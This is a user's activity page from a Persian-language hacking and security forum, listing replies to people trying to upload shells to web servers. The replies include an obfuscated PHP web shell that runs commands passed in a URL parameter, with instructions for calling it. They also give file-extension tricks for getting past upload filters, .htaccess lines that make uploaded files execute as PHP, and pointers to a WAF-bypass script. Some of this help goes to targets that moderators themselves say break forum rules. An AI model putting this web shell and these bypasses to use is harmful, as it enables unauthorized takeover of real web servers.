با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.
0day
-
تعداد ارسال ها
155 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
16 -
Country
ایران
12 دنبال کننده
آخرین بازدید کنندگان نمایه
5832 بازدید کننده نمایه
-
هش بصورت md5 همراه با سالت میباشد . الگوریتم هش md5 salt برای کرک هم باید سالت هم داشته باشید
- 3 پاسخ
-
- 2
-
-
-
وقتی اپلود نشود مشکل شما اپلود شل و انتی شلر نیست یعنی فایل اجرایی اپلود نمیشود روسرور شما میتونی این بایپس ها هم تست کنید php5. phtml. shell.html;.php
- 5 پاسخ
-
- 1
-
-
<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_GET[icg];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?> این شل توی یک فایل ذخیره کنید مثلا shell.php فراخونی شل به این صورت که ;site.com/shell.php?icg=echo icg اگر عبارت icg به شما نشون داد یعنی شل با موفقیت اپلود شد اگر به اینصورت اپلود شود میشود باقی مراحل میشود بایپس کرد این تست مربوط به امکان اپلود شدن شل برروی سرور هست
- 5 پاسخ
-
- 1
-
-
سلام جزییات بیشتری میگفتید سرور چیه cms چیه php - aspx - asp اگر فایروال داره جزییاتشو بیان کنید
-
Microsoft Outlook/Office Email Cracker/Checker By Aron-Tn
sitehunter پاسخی برای موضوع ارسال کرد برای یک 0day در Software
Hello, I do not know what country you are from? Please keep in mind that the post or topic that you publish must have the necessary explanations. According to the rules of the association , your post will be deleted. Thank you.- 1 پاسخ
-
- 1
-
-
سلام پست شما خلاف قوانین انجمن هست این رو که خداروشکر کاملا آگاه هستید لیست ایمیل در اوردن کار زیاد سختی نیست هیچ چیزی به راحتی به دست نمیاد شما خودتون تلاش کوشش کنید به نتیجه برسید اگر سوالی در زمینه پن تست امنیت داشتید در خدمتیم باشد که رستگار شویم 🙄 تامام
- 2 پاسخ
-
- 2
-
-
سلامت خدمت همه ی دوستان همکاران عزیزان مدتی بود واقعا کم کار شدیم یکم انرژی انگیزه ها کم شده بود و تایم کاری هم اجازه فعالیت مستمر رو نمیداد 😟 الان در خدمتتون هستیم قراره در این تاپیک بصورت جامع آخرین ابزار های باگ بانتی در 2021-2020 در اختیار بچه ای گل ایران سایبر❤️ قرار دهیم توجه :این تاپیک جای پرس و پاسخ نیست اگر سوالی داشتید تایپک جدا ایجاد کنید برای سوال و جواب در آخر اگر ابزاری میدونستید جای خالی این توی تاپیک داره معرفی کنید یا خودتون بصورت پست قرار دهید ابزار پیوست کنید در انجمن
- 2 پاسخ
-
- 4
-
-
-
-
*** فعالیت جدید - تغییر فعالیت و انتقال مالکیت دامنه و سایت
یک موضوع پاسخی ارسال کرد برای 0day در اخبار و اطلاعیه
با سلام خدمت دوستان عزیز انجمن ایران سایبر پس از 1 ماه غیرفعال بودن مجددا راه اندازی گردید و با توجه به تغییراتی که در مالکیت و انجمن صورت گرفته است لازم است یک سری توضیحات جهت مشخص کردن محور فعالیت انجمن اعلام نمایم. 1- مالکیت و فعالیت دامین و سایت تغییر کرده است و زین پس در حوزه امنیت - آموزش امنیت و شبکه - ارزیابی امنیت فعالیت مینماید. 2- هرگونه نفوذ به وبسایت های داخلی و خارجی خلاف قوانین بوده و در صورت مشاهده کاربر خاطی از سایت اخراج شده و مسئولیت هرگونه تخلف بر عهده شخص میباشد نه وبسایت . 3- هرگونه بی احترامی و توهین چه به اشخاص داخلی و خارجی ممنوع بوده و مسئولیت احتمالی برعهده شخص میباشد. 4- انجام هرگونه فعالیت سیاسی کاملا ممنوع میباشد. *** از این تاریخ ( 06/05/1400 ) ( 2021 - 28july ) به قبل تمامی مسئولیت فعالیت ها چه داخل سایت و انجمن و چه خارج از سایت و مسائل مربوط به آن مربوط به مدیریت و مالکیت قبل سایت بوده و مدیریت جدید و مالک جدید سایت عهده دار مسائل حقوقی و ... نمیباشد. با تشکر . -
اپلود فایل ها به این صورت تست نمایید shell.php5 shell.php.test shell.phtml بیشتر از این نمیتونم راهنمایتون کنم تارگت شما خلاف قوانین انجمن می باشد موفق باشید
- 3 پاسخ
-
- 2
-
-
درود دوست عزیز قبل اپلود شل htaccess خودتون اپلود کنید AddType application/x-httpd-php .htaccess AddType application/x-httpd-php .php
- 3 پاسخ
-
- 2
-
-
مشکل در بایپس فایروال Imunify360
moghi پاسخی برای موضوع ارسال کرد برای یک 0day در تست نفوذ پذیری سرورها
شما باید .htacces اپلود کنید برای بایپس و اجازه اپلود فایل php یه لینک قرار میدهم روی این پیلود تست کنید اگر نتیجه نگرفتید اعلام کنید گزینه های بیشتری پیشنهاد میکنم یا بایپس میشه یا باید بایپس بشه https://thibaud-robin.fr/articles/bypass-filter-upload/- 4 پاسخ
-
- 2
-
-
مشکل در بایپس فایروال Imunify360
moghi پاسخی برای موضوع ارسال کرد برای یک 0day در تست نفوذ پذیری سرورها
درود این شل ساده برای بایپس انتی شلر هست waf سروری شل خودتون بارگزاری کردید انتی شلر پاک کرده میتونید از این وب شلر استفاده کنید شل اسکریپت برای پسوند اینارو تست کنید shell.Php5 shell;.jpg.php4 بهتره از ابزار برپ سویت از تب repeater استفاده کنید برای بایپس این چنین موارد درضمن برای بایپس Imunify360 waf می توانید از این اسکریپت بهره برداری کنید اگر سوالی بود در خدمتم اسکریت بایپس waf اینجا کلیک کنید- 4 پاسخ
-
- 3
-
-
درود بر شما دوست عزیز سوالتون پر از تناقض بوده ...! و این جور مطرح کردن سوال کیفت پاسخ گویی بی کیفیت تر میکنه تارگت sqli دارید ؟ پس از ابزار sqlmap استفاده کنید یا بصورت دستی یا از ابزار های هک بار استفاده کنید توصیه بنده به شما اینه که بصورت پایه کار کنید و با کسب علم و دانش تجربه سطح لول شما افزایش خواهد یافت دوره و ابزار های پیشنهادی به شما ceh version 10 owasp top 10 burp suite sqlmap طبق یک رودمپ حرفه ای کار کنید
- 5 پاسخ
-
- 1
-
-
Forbidden admin panel bypass
Alpha پاسخی برای موضوع ارسال کرد برای یک 0day در تحلیل و بررسی آسیب پذیری های سایت و سرورها
سلام دوست عزیز سوال شما کمی مبهم هست وقتی قصد ورود به کنترل پنل ادمین دارید با ارور بالا مواجه می شوید به معنی این است که از این حالت خارج نیست 1 - ادرس کنترل پنل ادمین عوض شده میتونید از ادمین فایندر استفاده کنید 2- برای ورود به کنترل پنل ادمین ای پی محدود کرده که این احتمال امکان بایپس خیلی کم هست- 2 پاسخ
-
- 2
-
-
درود دوست عزیز توصیحات شما بسیار کلی بوده نیاز به بررسی دارد بهتر لاگ های سرور بررسی و آنالیز کنید دوم سورس سایت را از نظر فنی بررسی کنید مثال : ممکن فرد نفوذگر بخاطر پیکیر بندی نادرست درستی گرفته از سایت وبکدور کاشته و هر دفعه اقدام به تخریب می نماید و کلی سناریو هست بهترین راه انالیر و تحلیل لاگ های سرور و تست امنیت سورس و پرمیشن بندی فایل اقدام نمایید باتشکر
- 4 پاسخ
-
- 2
-
